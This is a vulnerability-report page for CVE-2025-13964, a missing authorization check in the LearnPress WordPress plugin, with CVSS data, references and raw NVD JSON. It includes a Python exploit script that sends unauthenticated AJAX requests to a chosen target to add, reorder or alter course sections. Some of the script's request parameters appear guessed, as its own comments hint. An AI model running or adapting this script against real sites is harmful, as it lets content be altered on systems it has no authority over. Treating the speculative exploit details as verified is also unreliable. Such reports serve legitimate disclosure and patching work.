Security Vulnerability Report
CVE-2025-13964 CVSS 5.3 MEDIUM


Published: 2026-01-06 09:15:55
Last Modified: 2026-04-15 00:35:42

Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to modify course contents by adding/removing/updating/re-ordering sections or modifying section items.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LearnPress WordPress LMS Plugin < 4.3.3
LearnPress <= 4.3.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13964 PoC - LearnPress Unauthorized Data Modification
# Target: WordPress site with LearnPress plugin <= 4.3.2

def exploit_learnpress(target_url, action_type):
    """
    Exploit LearnPress IDOR vulnerability
    action_type: 'add_section', 'remove_section', 'reorder', 'update_item'
    """
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Common headers
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Action 1: Add new section (requires course_id)
    if action_type == 'add_section':
        data = {
            'action': 'lp_ajax',  # Or specific LearnPress AJAX action
            'request': 'add_section',
            'nonce': '',  # No nonce required due to vulnerability
            'course_id': '1',  # Target course ID
            'section_title': 'Malicious Section',
            'section_order': '999'
        }

    # Action 2: Reorder sections
    elif action_type == 'reorder':
        data = {
            'action': 'lp_ajax',
            'request': 'reorder_section',
            'course_id': '1',
            'sections': '[{"id":1,"order":1},{"id":2,"order":0}]'
        }

    # Action 3: Update section items
    elif action_type == 'update_item':
        data = {
            'action': 'lp_ajax',
            'request': 'update_item',
            'section_id': '1',
            'item_type': 'lp_lesson',
            'item_id': '1',
            'item_data': '{"title":"Modified Content"}'
        }
    else:
        print("Unknown action type")
        return None

    try:
        response = requests.post(ajax_url, data=data, headers=headers, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python poc.py <target_url> <action_type>")
        print("Example: python poc.py http://example.com add_section")
        sys.exit(1)

    target = sys.argv[1]
    action = sys.argv[2]
    result = exploit_learnpress(target, action)
    print(f"Response: {result}")
```

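References

https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/AbstractAjax.php#L18
https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/EditCurriculumAjax.php#L52
https://www.wordfence.com/threat-intel/vulnerabilities/id/ae363511-8a1f-476a-9851-61f7763428c2?source=cve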

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13964", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:54.513", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to modify course contents by adding/removing/updating/re-ordering sections or modifying section items."}, {"lang": "es", "value": "El plugin LearnPress – WordPress LMS Plugin para WordPress es vulnerable a la modificación no autorizada de datos debido a una verificación de capacidad faltante en la función catch_lp_ajax en todas las versiones hasta, e incluyendo, la 4.3.2. Esto hace posible que atacantes no autenticados modifiquen los contenidos del curso al añadir/eliminar/actualizar/reordenar secciones o modificar elementos de sección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/AbstractAjax.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/EditCurriculumAjax.php#L52", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/ae363511-8a1f-476a-9851-61f7763428c2?source=cve", "source": "[email protected]"}]}}